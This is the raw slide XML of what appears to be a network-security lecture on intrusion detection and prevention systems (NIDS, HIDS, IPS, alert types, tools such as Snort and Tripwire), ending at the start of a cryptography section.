              <a:t>They are documented in the Computer Emergency Response Team (CERT) archives at  http://www.cert.org.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:srgbClr val="004666"/>
              </a:solidFill>
              <a:uFill>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:uFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="438840" indent="-319680">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="800000"/>
              </a:buClr>
              <a:buFont typeface="Wingdings 2" charset="2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:uFill>
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                </a:uFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Network equipment weakness</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:srgbClr val="004666"/>
              </a:solidFill>
              <a:uFill>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:uFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="731520" lvl="1" indent="-273960">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="800000"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="004666"/>
                </a:solidFill>
                <a:uFill>
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                </a:uFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Various type of network equipment, such as routers, firewalls, and switches have security weaknesses that must be recognized and protected against. Their weaknesses include password protection, lack of authentication, routing protocols, and firewall holes.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IDS Alerts</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:uFill>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:uFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="599"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dirty="0">
                <a:solidFill>
                  <a:srgbClr val="004666"/>
                </a:solidFill>
                <a:uFill>
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                </a:uFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Alerts are generated from Events of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="0" strike="noStrike" spc="-1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="004666"/>
                </a:solidFill>
                <a:uFill>
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                </a:uFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Intrest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="0" strike="noStrike" spc="-1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="004666"/>
                </a:solidFill>
                <a:uFill>
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                </a:uFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t> EOI</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="105000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" b="0" strike="noStrike" spc="-1" dirty="0">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dirty="0">
                <a:solidFill>
                  <a:srgbClr val="004666"/>
                </a:solidFill>
                <a:uFill>
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                </a:uFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>4 types of events:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="743040" lvl="1" indent="-285480">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="800000"/>
              </a:buClr>
              <a:buFont typeface="Symbol"/>
              <a:buChar char="à"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="0" strike="noStrike" spc="-1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="004666"/>
                </a:solidFill>
                <a:uFill>
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                </a:uFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>True </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="0" strike="noStrike" spc="-1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="004666"/>
                </a:solidFill>
                <a:uFill>
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                </a:uFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Positive </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1200240" lvl="2" indent="-285480">
              <a:buClr>
                <a:srgbClr val="800000"/>
              </a:buClr>
              <a:buFont typeface="Symbol"/>
              <a:buChar char="à"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" spc="-1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="004666"/>
                </a:solidFill>
                <a:uFill>
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                </a:uFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Attacks detected as attacks</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200" b="0" strike="noStrike" spc="-1" dirty="0" smtClean="0">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dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="004666"/>
                </a:solidFill>
                <a:uFill>
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                </a:uFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>True Negative</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1200240" lvl="2" indent="-285480">
              <a:buClr>
                <a:srgbClr val="800000"/>
              </a:buClr>
              <a:buFont typeface="Symbol"/>
              <a:buChar char="à"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" spc="-1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="004666"/>
                </a:solidFill>
                <a:uFill>
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                </a:uFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Legitimate detected as legitimate </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" b="0" strike="noStrike" spc="-1" dirty="0">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dirty="0">
                <a:solidFill>
                  <a:srgbClr val="004666"/>
                </a:solidFill>
                <a:uFill>
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                </a:uFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>False </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="0" strike="noStrike" spc="-1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="004666"/>
                </a:solidFill>
                <a:uFill>
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                </a:uFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Positive</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1200240" lvl="2" indent="-285480">
              <a:buClr>
                <a:srgbClr val="800000"/>
              </a:buClr>
              <a:buFont typeface="Symbol"/>
              <a:buChar char="à"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" spc="-1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="004666"/>
                </a:solidFill>
                <a:uFill>
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                </a:uFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Legitimate detected as attacks</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200" b="0" strike="noStrike" spc="-1" dirty="0" smtClean="0">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dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="004666"/>
                </a:solidFill>
                <a:uFill>
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                </a:uFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>False Negative</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1200240" lvl="2" indent="-285480">
              <a:buClr>
                <a:srgbClr val="800000"/>
              </a:buClr>
              <a:buFont typeface="Symbol"/>
              <a:buChar char="à"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" spc="-1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="004666"/>
                </a:solidFill>
                <a:uFill>
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                </a:uFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Attacks detected as legitimate</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200" b="0" strike="noStrike" spc="-1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="004666"/>
              </a:solidFill>
              <a:uFill>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:uFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1200240" lvl="2" indent="-285480">
              <a:buClr>
                <a:srgbClr val="800000"/>
              </a:buClr>
              <a:buFont typeface="Symbol"/>
              <a:buChar char="à"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" b="0" strike="noStrike" spc="-1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="004666"/>
              </a:solidFill>
              <a:uFill>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:uFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400" b="0" strike="noStrike" spc="-1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="004666"/>
              </a:solidFill>
              <a:uFill>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:uFill>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Deep Vs Shallow Inspection</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:uFill>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:uFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="60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Shallow</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Fast</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Examines header information</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:srgbClr val="004666"/>
              </a:solidFill>
              <a:uFill>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:uFill>
              <a:latin typeface="Arial"/>
            </a:endParaRP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Deep</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Slow, requires stateful tracking of data</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Inspects all fields including variable length fields</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:srgbClr val="004666"/>
              </a:solidFill>
              <a:uFill>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:uFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>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NIDS Challenges</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:uFill>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:uFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="603"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Deployment challenges including deployment and access limitations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Analyzing encrypted traffic</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Quantity Vs quality of signatures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Performance limitations (Speed of Processing, and Size of Storage)</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Very costly for proper management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NIDS Pros</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:uFill>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:uFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="605"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Internet is a large attack vector</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Fairly easy to setup</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Does not affect the speed of the network or add load to the systems it monitors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NIDS Cons</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:uFill>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:uFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="607"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Sensors have limited speed</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Almost impossible to detect attacks not in rule set</a:t>
            </a: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NIDS Examples</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:uFill>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:uFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="609"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Tcpdump</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Snort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HIDS</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:uFill>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:uFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="61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Host-based systems monitor their network connections and file system status. </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Have to acquire the aggregate logs of ALL critical systems at a minimum</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When potential problems are found, alerts are raised</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Monitoring and controlling traffic into and out of the host</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Generating logs that record activity on the host</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Performing actions based on what is found in the logs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Managing file changes on the host- authorized or otherwise</a:t>
            </a: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Unix Based- HIDS</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:uFill>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:uFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="613"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TCPWrappers and Xinetd</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Port Sentry (reacts to port scans)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Syslog</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Swatch</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Tripwire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Syslog</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:uFill>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:uFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="615"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Unix system logger can be on a local system or other system</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Logs can offer valuable information, but they can also be compromised</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Swatch or other tools can monitor syslog and raise alerts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Windows Based HIDS</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:uFill>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:uFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="617"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System Tools: Event Viewer, Netstat</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Port and Process Tools: Fport</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="105000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="24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File Integrity Checkers: Tripwire for Windows</a:t>
            </a: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Configuration Weakness</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:uFill>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:uFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="133"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Unsecured user accounts</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System accounts with easily guessed passwords</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Misconfigured Internet services</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Unsecured default settings within products</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Misconfigured network equipment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Event Viewer</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:uFill>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:uFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="619" name="Picture 2"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="1523880"/>
            <a:ext cx="7924320" cy="4800240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="9360">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Netstat -a</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:uFill>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:uFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="621" name="Picture 2"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="609480" y="1600200"/>
            <a:ext cx="8076960" cy="4723920"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="9360">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Fport</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:uFill>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:uFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="623" name="Picture 2"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="533520" y="1676520"/>
            <a:ext cx="8152920" cy="4495320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="9360">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IPS</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:uFill>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:uFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="625"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Intrusion Prevention Systems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A network security device that monitors network activities for malicious or unwanted behavior and can react, in real-time, to block or prevent those activities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IPS stops attacks on systems and networks from being effective</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Technology more recent, but rapidly maturing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="105000"/>
              </a:lnSpc>
            </a:pPr>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Passive IDS Deployment</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:uFill>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:uFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="627" name="Picture 4"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1143000" y="2209680"/>
            <a:ext cx="7274160" cy="3657240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="9360">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Active IPS Deployment</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:uFill>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:uFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="629" name="Picture 2"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1962000" y="2816280"/>
            <a:ext cx="5219640" cy="2215800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="9360">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Product Examples</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:uFill>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:uFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="631"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McAfee HIPS</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IBM ISS Proventia</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CheckPoint’s VPN, Smart Defens and InterSpect</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Norton Internet Security</a:t>
            </a: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Tipping Point IPS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="343080" indent="-342720">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="24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IPS Challenges</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:uFill>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:uFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="633" name="TextShape 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="1752480"/>
            <a:ext cx="7772040" cy="4343040"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>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HIPS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False positives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Supports a limited suite of applications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Requires more system resources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Limitation on number of managed nodes by every console</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:srgbClr val="004666"/>
              </a:solidFill>
              <a:uFill>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:uFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="343080" indent="-342720">
              <a:lnSpc>
                <a:spcPct val="105000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="800000"/>
              </a:buClr>
              <a:buFont typeface="Symbol"/>
              <a:buChar char="à"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="004666"/>
                </a:solidFill>
                <a:uFill>
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                </a:uFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>NIPS</a:t>
            </a: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Can not afford false positives?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200" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="004666"/>
                </a:solidFill>
                <a:uFill>
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                </a:uFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Keeping up with traffic demands</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ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Cryptography</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1003362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457200" indent="-457200"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Cryptographic Services</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11267" name="Rectangle 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Securing Communications</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="4" name="Group 3"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1905000" y="2792726"/>
            <a:ext cx="4980740" cy="2693674"/>
            <a:chOff x="2133600" y="1828800"/>
            <a:chExt cx="5105400" cy="3581400"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="Oval 10"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2133600" y="1828800"/>
              <a:ext cx="5105400" cy="3581400"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent1"/>
            </a:solidFill>
            <a:ln w="9525">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr eaLnBrk="0" fontAlgn="base" hangingPunct="0">
                <a:lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
                <a:spcBef>
